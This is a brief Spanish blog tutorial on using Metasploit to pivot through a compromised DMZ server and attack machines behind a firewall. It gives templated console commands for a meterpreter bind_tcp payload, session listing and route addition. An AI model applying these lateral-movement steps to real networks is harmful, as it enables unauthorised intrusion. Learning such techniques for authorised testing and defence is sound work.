Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
Algunas veces, al realizar un ataque es necesario vulnerar varias maquinas hasta llegar a nuestro objetivo final, uno de los interrogantes mas comunes en estas situaciones es ¿Como puedo atacar una maquina desde otra la cual ya tenga acceso?
Veamos un ejemplo:
Como podemos ver en la imagen anterior, un atacante puede ganar el acceso en algún servidor que se encuentre en la DMZ (zona desmiritalizada) y desde allí atacar otras maquinas que se encuentren detrás del cortafuegos. Para hacer esto posible el amado y conocido Metasploit nos puede ser muy útil.
El primer paso obviamente es encontrar una vulnerabilidad en el servidor que se encuentra en la DMZ, explotarla usando como payload meterpreter. En la consola del metasploit digitamos:
use [exploit que ataca la vulnerabilidad encontrada]
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST [ip_host_dmz]
exploit-que-ataca-la-vulnerabilidad-encontrada
Ahora necesitamos saber el ID de la sesión, para esto digitamos lo siguiente en la consola de meterpreter:
sessions -l
El siguiente paso es crear una ruta hacia la maquina objetivo, indicando su ip, la mascara y el ID session que obtuvimos en el paso anterior:
msf> route add [ip_maquina_objetivo] [Mascara de red] [ID-Session]
Por ultimo, lanzamos el ataque a la maquina objetivo, de forma normal como se haría en cualquier caso, es decir buscando la vulnerabilidad y aplicando el exploit respectivo, lo diferente es que debemos decirle al metasploit que debe pasar por el pc que ya se tiene acceso:
msf> use [exploit_necesario]
msf> set PAYLOAD windows/meterpreter/bind_tcp
msf> set RHOST [maquina_objetivo]
msf> exploit
De esta forma podremos bypassear usando el metasploit, algo muy útil para todos los interesados en el área de la seguridad informática
[sam_ad id="3"]